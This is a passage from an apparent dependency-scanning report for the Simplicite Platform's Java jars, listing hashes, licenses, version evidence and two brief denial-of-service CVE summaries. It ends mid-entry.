Vendor | Manifest | bundle-docurl | http://github.com/FasterXML/jackson-jaxrs-providers/jackson-jaxrs-base | Low
Vendor | Manifest | bundle-symbolicname | com.fasterxml.jackson.jaxrs.jackson-jaxrs-base | Medium
Vendor | Manifest | implementation-build-date | 2020-07-21 03:57:12+0000 | Low
Vendor | Manifest | Implementation-Vendor | FasterXML | High
Vendor | Manifest | Implementation-Vendor-Id | com.fasterxml.jackson.jaxrs | Medium
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low
Vendor | Manifest | specification-vendor | FasterXML | Low
Vendor | pom | artifactid | jackson-jaxrs-base | Highest
Vendor | pom | artifactid | jackson-jaxrs-base | Low
Vendor | pom | groupid | com.fasterxml.jackson.jaxrs | Highest
Vendor | pom | name | Jackson-JAXRS-base | High
Vendor | pom | parent-artifactid | jackson-jaxrs-providers | Low
Product | file | name | jackson-jaxrs-base | High
Product | jar | package name | base | Highest
Product | jar | package name | fasterxml | Highest
Product | jar | package name | jackson | Highest
Product | jar | package name | jaxrs | Highest
Product | Manifest | bundle-docurl | http://github.com/FasterXML/jackson-jaxrs-providers/jackson-jaxrs-base | Low
Product | Manifest | Bundle-Name | Jackson-JAXRS-base | Medium
Product | Manifest | bundle-symbolicname | com.fasterxml.jackson.jaxrs.jackson-jaxrs-base | Medium
Product | Manifest | implementation-build-date | 2020-07-21 03:57:12+0000 | Low
Product | Manifest | Implementation-Title | Jackson-JAXRS-base | High
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low
Product | Manifest | specification-title | Jackson-JAXRS-base | Medium
Product | pom | artifactid | jackson-jaxrs-base | Highest
Product | pom | groupid | com.fasterxml.jackson.jaxrs | Highest
Product | pom | name | Jackson-JAXRS-base | High
Product | pom | parent-artifactid | jackson-jaxrs-providers | Medium
Version | file | version | 2.10.5 | High
Version | Manifest | Bundle-Version | 2.10.5 | High
Version | Manifest | Implementation-Version | 2.10.5 | High
Version | pom | version | 2.10.5 | Highest
jackson-jaxrs-json-provider-2.10.5.jar
Description: Functionality to handle JSON input/output for JAX-RS implementations (like Jersey and RESTeasy) using standard Jackson data binding.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/jaxrs/jackson-jaxrs-json-provider/2.10.5/jackson-jaxrs-json-provider-2.10.5.jar
MD5: 523048dfe6878997218ea0b2cdb9af08
SHA1: e7be01e92f7ef9361118eef78f1974c5f778dd6a
SHA256: f0817100df27ded044dc9ac6effdb9961a3c37327c6c9262ed344218db048c7b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jackson-jaxrs-json-provider | High
Vendor | jar | package name | fasterxml | Highest
Vendor | jar | package name | jackson | Highest
Vendor | jar | package name | jaxrs | Highest
Vendor | jar | package name | json | Highest
Vendor | Manifest | bundle-docurl | http://github.com/FasterXML/jackson-jaxrs-providers/jackson-jaxrs-json-provider | Low
Vendor | Manifest | bundle-symbolicname | com.fasterxml.jackson.jaxrs.jackson-jaxrs-json-provider | Medium
Vendor | Manifest | implementation-build-date | 2020-07-21 03:57:12+0000 | Low
Vendor | Manifest | Implementation-Vendor | FasterXML | High
Vendor | Manifest | Implementation-Vendor-Id | com.fasterxml.jackson.jaxrs | Medium
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low
Vendor | Manifest | specification-vendor | FasterXML | Low
Vendor | pom | artifactid | jackson-jaxrs-json-provider | Highest
Vendor | pom | artifactid | jackson-jaxrs-json-provider | Low
Vendor | pom | groupid | com.fasterxml.jackson.jaxrs | Highest
Vendor | pom | name | Jackson-JAXRS-JSON | High
Vendor | pom | parent-artifactid | jackson-jaxrs-providers | Low
Product | file | name | jackson-jaxrs-json-provider | High
Product | jar | package name | fasterxml | Highest
Product | jar | package name | jackson | Highest
Product | jar | package name | jaxrs | Highest
Product | jar | package name | json | Highest
Product | Manifest | bundle-docurl | http://github.com/FasterXML/jackson-jaxrs-providers/jackson-jaxrs-json-provider | Low
Product | Manifest | Bundle-Name | Jackson-JAXRS-JSON | Medium
Product | Manifest | bundle-symbolicname | com.fasterxml.jackson.jaxrs.jackson-jaxrs-json-provider | Medium
Product | Manifest | implementation-build-date | 2020-07-21 03:57:12+0000 | Low
Product | Manifest | Implementation-Title | Jackson-JAXRS-JSON | High
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low
Product | Manifest | specification-title | Jackson-JAXRS-JSON | Medium
Product | pom | artifactid | jackson-jaxrs-json-provider | Highest
Product | pom | groupid | com.fasterxml.jackson.jaxrs | Highest
Product | pom | name | Jackson-JAXRS-JSON | High
Product | pom | parent-artifactid | jackson-jaxrs-providers | Medium
Version | file | version | 2.10.5 | High
Version | Manifest | Bundle-Version | 2.10.5 | High
Version | Manifest | Implementation-Version | 2.10.5 | High
Version | pom | version | 2.10.5 | Highest
CVE-2022-45688
A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data.
CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
CVE-2023-5072
Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions:
jackson-jaxrs-xml-provider-2.10.5.jar
Description: Functionality to handle XML input/output for JAX-RS implementations (like Jersey and RESTeasy) using standard Jackson data binding.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/jaxrs/jackson-jaxrs-xml-provider/2.10.5/jackson-jaxrs-xml-provider-2.10.5.jar
MD5: 395bf69b81245c6dc274c7b8d2358876
SHA1: 8e374b72f30e3861040f1ab7f859bc8bcc804eac
SHA256: 478951b5abc1d53c850f247fcacbb9a1c1c6315a6e9e1a3853571d4d96a71f10
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jackson-jaxrs-xml-provider | High
Vendor | jar | package name | fasterxml | Highest
Vendor | jar | package name | jackson | Highest
Vendor | jar | package name | jaxrs | Highest
Vendor | jar | package name | xml | Highest
Vendor | Manifest | bundle-docurl | http://github.com/FasterXML/jackson-jaxrs-providers/jackson-jaxrs-xml-provider | Low
Vendor | Manifest | bundle-symbolicname | com.fasterxml.jackson.jaxrs.jackson-jaxrs-xml-provider | Medium
Vendor | Manifest | implementation-build-date | 2020-07-21 03:57:12+0000 | Low
Vendor | Manifest | Implementation-Vendor | FasterXML | High
Vendor | Manifest | Implementation-Vendor-Id | com.fasterxml.jackson.jaxrs | Medium
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low
Vendor | Manifest | specification-vendor | FasterXML | Low
Vendor | pom | artifactid | jackson-jaxrs-xml-provider | Highest
Vendor | pom | artifactid | jackson-jaxrs-xml-provider | Low
Vendor | pom | groupid | com.fasterxml.jackson.jaxrs | Highest
Vendor | pom | name | Jackson-JAXRS-XML | High
Vendor | pom | parent-artifactid | jackson-jaxrs-providers | Low
Product | file | name | jackson-jaxrs-xml-provider | High
Product | jar | package name | fasterxml | Highest
Product | jar | package name | jackson | Highest
Product | jar | package name | jaxrs | Highest
Product | jar | package name | xml | Highest
Product | Manifest | bundle-docurl | http://github.com/FasterXML/jackson-jaxrs-providers/jackson-jaxrs-xml-provider | Low
Product | Manifest | Bundle-Name | Jackson-JAXRS-XML | Medium
Product | Manifest | bundle-symbolicname | com.fasterxml.jackson.jaxrs.jackson-jaxrs-xml-provider | Medium
Product | Manifest | implementation-build-date | 2020-07-21 03:57:12+0000 | Low
Product | Manifest | Implementation-Title | Jackson-JAXRS-XML | High
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low
Product | Manifest | specification-title | Jackson-JAXRS-XML | Medium
Product | pom | artifactid | jackson-jaxrs-xml-provider | Highest
Product | pom | groupid | com.fasterxml.jackson.jaxrs | Highest
Product | pom | name | Jackson-JAXRS-XML | High
Product | pom | parent-artifactid | jackson-jaxrs-providers | Medium
Version | file | version | 2.10.5 | High
Version | Manifest | Bundle-Version | 2.10.5 | High
Version | Manifest | Implementation-Version | 2.10.5 | High
Version | pom | version | 2.10.5 | Highest
jackson-module-jaxb-annotations-2.10.5.jar
Description: Support for using JAXB annotations as an alternative to "native" Jackson annotations, for configuring data-binding.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/fasterxml/jackson/module/jackson-module-jaxb-annotations/2.10.5/jackson-module-jaxb-annotations-2.10.5.jar
MD5: 85f8c37a9c6504d0891b909c0d210be6
SHA1: f438b5eb66d15cbffca1497408b4cb379af9b068
SHA256: 994a0a510a35d55a869567807075736597da97e9d36ad1ebaff5e37def5a55d3
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jackson-module-jaxb-annotations | High
Vendor | jar | package name | fasterxml | Highest
Vendor | jar | package name | jackson | Highest
Vendor | jar | package name | jaxb | Highest
Vendor | jar | package name | module | Highest
Vendor | Manifest | bundle-docurl | https://github.com/FasterXML/jackson-modules-base | Low
Vendor | Manifest | bundle-symbolicname | com.fasterxml.jackson.module.jackson-module-jaxb-annotations | Medium
Vendor | Manifest | implementation-build-date | 2020-07-21 03:03:15+0000 | Low
Vendor | Manifest | Implementation-Vendor | FasterXML | High
Vendor | Manifest | Implementation-Vendor-Id | com.fasterxml.jackson.module | Medium
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low
Vendor | Manifest | specification-vendor | FasterXML | Low
Vendor | pom | artifactid | jackson-module-jaxb-annotations | Highest
Vendor | pom | artifactid | jackson-module-jaxb-annotations | Low
Vendor | pom | groupid | com.fasterxml.jackson.module | Highest
Vendor | pom | name | Jackson module: JAXB Annotations | High
Vendor | pom | parent-artifactid | jackson-modules-base | Low
Vendor | pom | url | FasterXML/jackson-modules-base | Highest
Product | file | name | jackson-module-jaxb-annotations | High
Product | jar | package name | fasterxml | Highest
Product | jar | package name | jackson | Highest
Product | jar | package name | jaxb | Highest
Product | jar | package name | module | Highest
Product | Manifest | bundle-docurl | https://github.com/FasterXML/jackson-modules-base | Low
Product | Manifest | Bundle-Name | Jackson module: JAXB Annotations | Medium
Product | Manifest | bundle-symbolicname | com.fasterxml.jackson.module.jackson-module-jaxb-annotations | Medium
Product | Manifest | implementation-build-date | 2020-07-21 03:03:15+0000 | Low
Product | Manifest | Implementation-Title | Jackson module: JAXB Annotations | High
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.7))" | Low
Product | Manifest | specification-title | Jackson module: JAXB Annotations | Medium
Product | pom | artifactid | jackson-module-jaxb-annotations | Highest
Product | pom | groupid | com.fasterxml.jackson.module | Highest
Product | pom | name | Jackson module: JAXB Annotations | High
Product | pom | parent-artifactid | jackson-modules-base | Medium
Product | pom | url | FasterXML/jackson-modules-base | High
Version | file | version | 2.10.5 | High
Version | Manifest | Bundle-Version | 2.10.5 | High
Version | Manifest | Implementation-Version | 2.10.5 | High
Version | pom | version | 2.10.5 | Highest
jai-imageio-core-1.4.0.jar
Description: Java Advanced Imaging Image I/O Tools API core, but without the classes involved with javax.media.jai dependencies, JPEG2000 or codecLibJIIO, meaning that this library can be distributed under the modified BSD license and should be GPL compatible.
License: BSD 3-clause License w/nuclear disclaimer: LICENSE.txt
File Path: /var/simplicite/.m2/repository/com/github/jai-imageio/jai-imageio-core/1.4.0/jai-imageio-core-1.4.0.jar
MD5: 6978d733bfb55c0a82639f724fe5f3bb
SHA1: fb6d79b929556362a241b2f65a04e538062f0077
SHA256: 8ad3c68e9efffb10ac87ff8bc589adf64b04a729c5194c079efd0643607fd72a
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jai-imageio-core | High
Vendor | jar | package name | github | Highest
Vendor | Manifest | bundle-docurl | https://github.com/jai-imageio/ | Low
Vendor | Manifest | bundle-symbolicname | jai-imageio-core | Medium
Vendor | Manifest | extension-name | com.github.jai-imageio-jai-imageio-core | Medium
Vendor | Manifest | Implementation-Vendor | https://github.com/jai-imageio/ jai-imageio GitHub group | High
Vendor | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" | Low
Vendor | Manifest | specification-vendor | Sun Microsystems, Inc. | Low
Vendor | Manifest | url | https://github.com/jai-imageio/jai-imageio-core | Low
Vendor | pom | artifactid | jai-imageio-core | Highest
Vendor | pom | artifactid | jai-imageio-core | Low
Vendor | pom | developer email | stian@s11.no | Low
Vendor | pom | developer name | Stian Soiland-Reyes | Medium
Vendor | pom | developer org | s11 | Medium
Vendor | pom | developer org URL | http://s11.no/ | Medium
Vendor | pom | groupid | com.github.jai-imageio | Highest
Vendor | pom | name | Java Advanced Imaging Image I/O Tools API core (standalone) | High
Vendor | pom | organization name | jai-imageio GitHub group | High
Vendor | pom | organization url | jai-imageio/ | Medium
Vendor | pom | url | jai-imageio/jai-imageio-core | Highest
Product | file | name | jai-imageio-core | High
Product | jar | package name | github | Highest
Product | Manifest | bundle-docurl | https://github.com/jai-imageio/ | Low
Product | Manifest | Bundle-Name | Java Advanced Imaging Image I/O Tools API core (standalone) | Medium
Product | Manifest | bundle-symbolicname | jai-imageio-core | Medium
Product | Manifest | extension-name | com.github.jai-imageio-jai-imageio-core | Medium
Product | Manifest | Implementation-Title | Java Advanced Imaging Image I/O Tools API core (standalone) | High
Product | Manifest | require-capability | osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" | Low
Product | Manifest | specification-title | Java Advanced Imaging | Medium
Product | Manifest | url | https://github.com/jai-imageio/jai-imageio-core | Low
Product | pom | artifactid | jai-imageio-core | Highest
Product | pom | developer email | stian@s11.no | Low
Product | pom | developer name | Stian Soiland-Reyes | Low
Product | pom | developer org | s11 | Low
Product | pom | developer org URL | http://s11.no/ | Low
Product | pom | groupid | com.github.jai-imageio | Highest
Product | pom | name | Java Advanced Imaging Image I/O Tools API core (standalone) | High
Product | pom | organization name | jai-imageio GitHub group | Low
Product | pom | url | jai-imageio/ | High
Product | pom | url | jai-imageio/jai-imageio-core | High
Version | file | version | 1.4.0 | High
Version | Manifest | Bundle-Version | 1.4.0 | High
Version | Manifest | Implementation-Version | 1.4.0 | High
Version | pom | version | 1.4.0 | Highest
jakarta.activation-1.2.1.jar
Description: JavaBeans Activation Framework
License: http://www.eclipse.org/org/documents/edl-v10.php
File Path: /var/simplicite/.m2/repository/com/sun/activation/jakarta.activation/1.2.1/jakarta.activation-1.2.1.jar
MD5: dc519b1f09bbaf9274ea5da358a00110
SHA1: 8013606426a73d8ba6b568370877251e91a38b89
SHA256: d84d4ba8b55cdb7fdcbb885e6939386367433f56f5ab8cfdc302a7c3587fa92b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jakarta.activation | High
Vendor | jar | package name | activation | Highest
Vendor | jar | package name | sun | Highest
Vendor | jar (hint) | package name | oracle | Highest
Vendor | Manifest | automatic-module-name | jakarta.activation | Medium
Vendor | Manifest | bundle-docurl | https://www.eclipse.org | Low
Vendor | Manifest | bundle-symbolicname | com.sun.activation.jakarta.activation | Medium
Vendor | Manifest | extension-name | jakarta.activation | Medium
Vendor | Manifest | Implementation-Vendor | Eclipse Foundation | High
Vendor | Manifest | Implementation-Vendor-Id | com.sun | Medium
Vendor | Manifest | specification-vendor | Eclipse Foundation | Low
Vendor | pom | artifactid | jakarta.activation | Highest
Vendor | pom | artifactid | jakarta.activation | Low
Vendor | pom | groupid | com.sun.activation | Highest
Vendor | pom | name | JavaBeans Activation Framework | High
Vendor | pom | parent-artifactid | all | Low
Product | file | name | jakarta.activation | High
Product | jar | package name | activation | Highest
Product | jar | package name | javax | Highest
Product | jar | package name | sun | Highest
Product | Manifest | automatic-module-name | jakarta.activation | Medium
Product | Manifest | bundle-docurl | https://www.eclipse.org | Low
Product | Manifest | Bundle-Name | JavaBeans Activation Framework | Medium
Product | Manifest | bundle-symbolicname | com.sun.activation.jakarta.activation | Medium
Product | Manifest | extension-name | jakarta.activation | Medium
Product | Manifest | Implementation-Title | javax.activation | High
Product | Manifest | specification-title | JavaBeans(TM) Activation Framework Specification | Medium
Product | pom | artifactid | jakarta.activation | Highest
Product | pom | groupid | com.sun.activation | Highest
Product | pom | name | JavaBeans Activation Framework | High
Product | pom | parent-artifactid | all | Medium
Version | file | version | 1.2.1 | High
Version | Manifest | Bundle-Version | 1.2.1 | High
Version | Manifest | Implementation-Version | 1.2.1 | High
Version | pom | version | 1.2.1 | Highest
jakarta.activation-api-1.2.1.jar
Description: JavaBeans Activation Framework API jar
License: http://www.eclipse.org/org/documents/edl-v10.php
File Path: /var/simplicite/.m2/repository/jakarta/activation/jakarta.activation-api/1.2.1/jakarta.activation-api-1.2.1.jar
MD5: 9b647398add993324d3d9e5effa6005a
SHA1: 562a587face36ec7eff2db7f2fc95425c6602bc1
SHA256: 8b0a0f52fa8b05c5431921a063ed866efaa41dadf2e3a7ee3e1961f2b0d9645b
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jakarta.activation-api | High
Vendor | jar | package name | activation | Highest
Vendor | Manifest | automatic-module-name | jakarta.activation | Medium
Vendor | Manifest | bundle-docurl | https://www.eclipse.org | Low
Vendor | Manifest | bundle-symbolicname | jakarta.activation-api | Medium
Vendor | Manifest | extension-name | jakarta.activation | Medium
Vendor | Manifest | Implementation-Vendor | Eclipse Foundation | High
Vendor | Manifest | Implementation-Vendor-Id | com.sun | Medium
Vendor | Manifest | specification-vendor | Eclipse Foundation | Low
Vendor | pom | artifactid | jakarta.activation-api | Highest
Vendor | pom | artifactid | jakarta.activation-api | Low
Vendor | pom | groupid | jakarta.activation | Highest
Vendor | pom | name | JavaBeans Activation Framework API jar | High
Vendor | pom | parent-artifactid | all | Low
Vendor | pom | parent-groupid | com.sun.activation | Medium
Product | file | name | jakarta.activation-api | High
Product | jar | package name | activation | Highest
Product | Manifest | automatic-module-name | jakarta.activation | Medium
Product | Manifest | bundle-docurl | https://www.eclipse.org | Low
Product | Manifest | Bundle-Name | JavaBeans Activation Framework API jar | Medium
Product | Manifest | bundle-symbolicname | jakarta.activation-api | Medium
Product | Manifest | extension-name | jakarta.activation | Medium
Product | Manifest | Implementation-Title | jakarta.activation.jakarta.activation-api | High
Product | Manifest | specification-title | jakarta.activation.jakarta.activation-api | Medium
Product | pom | artifactid | jakarta.activation-api | Highest
Product | pom | groupid | jakarta.activation | Highest
Product | pom | name | JavaBeans Activation Framework API jar | High
Product | pom | parent-artifactid | all | Medium
Product | pom | parent-groupid | com.sun.activation | Medium
Version | file | version | 1.2.1 | High
Version | Manifest | Bundle-Version | 1.2.1 | High
Version | Manifest | Implementation-Version | 1.2.1 | High
Version | pom | version | 1.2.1 | Highest
jakarta.xml.bind-api-2.3.2.jar
Description: JAXB (JSR 222) API
License: http://www.eclipse.org/org/documents/edl-v10.php
File Path: /var/simplicite/.m2/repository/jakarta/xml/bind/jakarta.xml.bind-api/2.3.2/jakarta.xml.bind-api-2.3.2.jar
MD5: dabb40ba58199304c640b7bd8bb2fbac
SHA1: 8d49996a4338670764d7ca4b85a1c4ccf7fe665d
SHA256: 69156304079bdeed9fc0ae3b39389f19b3cc4ba4443bc80508995394ead742ea
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | jakarta.xml.bind-api | High
Vendor | jar | package name | bind | Highest
Vendor | jar | package name | xml | Highest
Vendor | Manifest | bundle-docurl | https://www.eclipse.org | Low
Vendor | Manifest | bundle-symbolicname | jakarta.xml.bind-api | Medium
Vendor | Manifest | extension-name | jakarta.xml.bind | Medium
Vendor | Manifest | implementation-build-id | UNKNOWN-18b5002, 2018-12-27T15:29:49+0000 | Low
Vendor | Manifest | multi-release | true | Low
Vendor | Manifest | specification-vendor | Oracle Corporation | Low
Vendor | pom | artifactid | jakarta.xml.bind-api | Highest
Vendor | pom | artifactid | jakarta.xml.bind-api | Low
Vendor | pom | groupid | jakarta.xml.bind | Highest
Vendor | pom | parent-artifactid | jakarta.xml.bind-api-parent | Low
Product | file | name | jakarta.xml.bind-api | High
Product | jar | package name | bind | Highest
Product | jar | package name | jaxb | Highest
Product | jar | package name | xml | Highest
Product | Manifest | bundle-docurl | https://www.eclipse.org | Low
Product | Manifest | Bundle-Name | jakarta.xml.bind-api | Medium
Product | Manifest | bundle-symbolicname | jakarta.xml.bind-api | Medium
Product | Manifest | extension-name | jakarta.xml.bind | Medium
Product | Manifest | implementation-build-id | UNKNOWN-18b5002, 2018-12-27T15:29:49+0000 | Low
Product | Manifest | multi-release | true | Low
Product | pom | artifactid | jakarta.xml.bind-api | Highest
Product | pom | groupid | jakarta.xml.bind | Highest
Product | pom | parent-artifactid | jakarta.xml.bind-api-parent | Medium
Version | file | version | 2.3.2 | High
Version | Manifest | Bundle-Version | 2.3.2 | High
Version | Manifest | Implementation-Version | 2.3.2 | High
Version | pom | version | 2.3.2 | Highest
java-jwt-3.10.2.jar
Description: Java implementation of JSON Web Token (JWT)
License: The MIT License (MIT): https://raw.githubusercontent.com/auth0/java-jwt/master/LICENSE
File Path: /var/simplicite/.m2/repository/com/auth0/java-jwt/3.10.2/java-jwt-3.10.2.jar
MD5: 88ecbde4572957aa2333f1f2e8317584
SHA1: a73fc34425dffbf32207f74f1b78531ebeaf7685
SHA256: df47b77d8feda8cd9199b2a03ae2d2ebe60d40576c58ee6c6ef05c3407d20011
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | java-jwt | High
Vendor | jar | package name | auth0 | Highest
Vendor | jar | package name | jwt | Highest
Vendor | pom | artifactid | java-jwt | Highest
Vendor | pom | artifactid | java-jwt | Low
Vendor | pom | developer email | hernan@auth0.com | Low
Vendor | pom | developer email | luciano.balmaceda@auth0.com | Low
Vendor | pom | developer email | oss@auth0.com | Low
Vendor | pom | developer id | auth0 | Medium
Vendor | pom | developer id | hzalaz | Medium
Vendor | pom | developer id | lbalmaceda | Medium
Vendor | pom | developer name | Auth0 | Medium
Vendor | pom | developer name | Hernan Zalazar | Medium
Vendor | pom | developer name | Luciano Balmaceda | Medium
Vendor | pom | groupid | com.auth0 | Highest
Vendor | pom | name | java jwt | High
Vendor | pom | url | auth0/java-jwt | Highest
Product | file | name | java-jwt | High
Product | jar | package name | auth0 | Highest
Product | jar | package name | jwt | Highest
Product | Manifest | Implementation-Title | java-jwt | High
Product | pom | artifactid | java-jwt | Highest
Product | pom | developer email | hernan@auth0.com | Low
Product | pom | developer email | luciano.balmaceda@auth0.com | Low
Product | pom | developer email | oss@auth0.com | Low
Product | pom | developer id | auth0 | Low
Product | pom | developer id | hzalaz | Low
Product | pom | developer id | lbalmaceda | Low
Product | pom | developer name | Auth0 | Low
Product | pom | developer name | Hernan Zalazar | Low
Product | pom | developer name | Luciano Balmaceda | Low
Product | pom | groupid | com.auth0 | Highest
Product | pom | name | java jwt | High
Product | pom | url | auth0/java-jwt | High
Version | file | version | 3.10.2 | High
Version | Manifest | Implementation-Version | 3.10.2 | High
Version | pom | version | 3.10.2 | Highest
java-libpst-0.8.1.jar
Description: A library to read PST files with java, without need for external libraries.
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/pff/java-libpst/0.8.1/java-libpst-0.8.1.jar
MD5: 6be27662e0b06154e5f05938937d16b7
SHA1: ad31986653dac9cb5132ea5b2999c20b4b286255
SHA256: a3f7b3c934f477b0fc3c0eadebc3d24872bbebc3ac5a22ab575e5f476ea34757
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | java-libpst | High
Vendor | jar | package name | pff | Highest
Vendor | jar | package name | pff | Low
Vendor | pom | artifactid | java-libpst | Highest
Vendor | pom | artifactid | java-libpst | Low
Vendor | pom | developer email | @rjohnsondev | Low
Vendor | pom | developer name | Richard Johnson | Medium
Vendor | pom | developer org | Skimlinks | Medium
Vendor | pom | groupid | com.pff | Highest
Vendor | pom | name | java-libpst | High
Vendor | pom | url | https://code.google.com/p/java-libpst/ | Highest
Product | file | name | java-libpst | High
Product | jar | package name | pff | Highest
Product | pom | artifactid | java-libpst | Highest
Product | pom | developer email | @rjohnsondev | Low
Product | pom | developer name | Richard Johnson | Low
Product | pom | developer org | Skimlinks | Low
Product | pom | groupid | com.pff | Highest
Product | pom | name | java-libpst | High
Product | pom | url | https://code.google.com/p/java-libpst/ | Medium
Version | file | version | 0.8.1 | High
Version | pom | version | 0.8.1 | Highest
java-saml-2.5.0.jar
File Path: /var/simplicite/.m2/repository/com/onelogin/java-saml/2.5.0/java-saml-2.5.0.jar
MD5: 4471c76d5079596c9737a069bf8c16dd
SHA1: 98ef55b85676076f1fc94cc68d359e826170a16b
SHA256: 8959df4e44cb4ef3fdc740536609b6462928b1ce8912ac15d667c772da4a36b6
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | java-saml | High
Vendor | jar | package name | onelogin | Highest
Vendor | jar | package name | onelogin | Low
Vendor | jar | package name | saml2 | Low
Vendor | pom | artifactid | java-saml | Highest
Vendor | pom | artifactid | java-saml | Low
Vendor | pom | groupid | com.onelogin | Highest
Vendor | pom | name | OneLogin java-saml Toolkit | High
Vendor | pom | parent-artifactid | java-saml-toolkit | Low
Product | file | name | java-saml | High
Product | jar | package name | onelogin | Highest
Product | jar | package name | saml2 | Low
Product | pom | artifactid | java-saml | Highest
Product | pom | groupid | com.onelogin | Highest
Product | pom | name | OneLogin java-saml Toolkit | High
Product | pom | parent-artifactid | java-saml-toolkit | Medium
Version | file | version | 2.5.0 | High
Version | pom | version | 2.5.0 | Highest
java-saml-core-2.5.0.jar
File Path: /var/simplicite/.m2/repository/com/onelogin/java-saml-core/2.5.0/java-saml-core-2.5.0.jar
MD5: 630920f20b6ad95203ae6ca0ceefa518
SHA1: ec4c26db2b833511836f2cf37f445c275d0dff45
SHA256: 40ef219f434852a400501f5766848fbb62f16ec671d7a79fc0dfeb969c04fd6c
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | java-saml-core | High
Vendor | jar | package name | onelogin | Highest
Vendor | jar | package name | onelogin | Low
Vendor | jar | package name | saml2 | Low
Vendor | pom | artifactid | java-saml-core | Highest
Vendor | pom | artifactid | java-saml-core | Low
Vendor | pom | groupid | com.onelogin | Highest
Vendor | pom | name | OneLogin java-saml Toolkit Core | High
Vendor | pom | parent-artifactid | java-saml-toolkit | Low
Product | file | name | java-saml-core | High
Product | jar | package name | onelogin | Highest
Product | jar | package name | saml2 | Low
Product | pom | artifactid | java-saml-core | Highest
Product | pom | groupid | com.onelogin | Highest
Product | pom | name | OneLogin java-saml Toolkit Core | High
Product | pom | parent-artifactid | java-saml-toolkit | Medium
Version | file | version | 2.5.0 | High
Version | pom | version | 2.5.0 | Highest
java-xmlbuilder-1.1.jar
Description: XML Builder is a utility that creates simple XML documents using relatively sparse Java code
License: Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0
File Path: /var/simplicite/.m2/repository/com/jamesmurty/utils/java-xmlbuilder/1.1/java-xmlbuilder-1.1.jar
MD5: cd9afe97b82d327ceda4dac0de24d61c
SHA1: 05527416a8f63a8dad440434a1d42937d0ef6391
SHA256: 5257fdeb719b95039fc6cf35012527939856b2f2c9d763d593cc0cb64e88ab24
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | java-xmlbuilder | High
Vendor | jar | package name | jamesmurty | Highest
Vendor | jar | package name | jamesmurty | Low
Vendor | jar | package name | utils | Highest
Vendor | jar | package name | utils | Low
Vendor | jar | package name | xmlbuilder | Highest
Vendor | pom | artifactid | java-xmlbuilder | Highest
Vendor | pom | artifactid | java-xmlbuilder | Low
Vendor | pom | developer id | jmurty | Medium
Vendor | pom | developer name | James Murty | Medium
Vendor | pom | groupid | com.jamesmurty.utils | Highest
Vendor | pom | name | java-xmlbuilder | High
Vendor | pom | url | jmurty/java-xmlbuilder | Highest
Product | file | name | java-xmlbuilder | High
Product | jar | package name | jamesmurty | Highest
Product | jar | package name | utils | Highest
Product | jar | package name | utils | Low
Product | jar | package name | xmlbuilder | Highest
Product | pom | artifactid | java-xmlbuilder | Highest
Product | pom | developer id | jmurty | Low
Product | pom | developer name | James Murty | Low
Product | pom | groupid | com.jamesmurty.utils | Highest
Product | pom | name | java-xmlbuilder | High
Product | pom | url | jmurty/java-xmlbuilder | High
Version | file | version | 1.1 | High
Version | pom | version | 1.1 | Highest
CVE-2014-125087
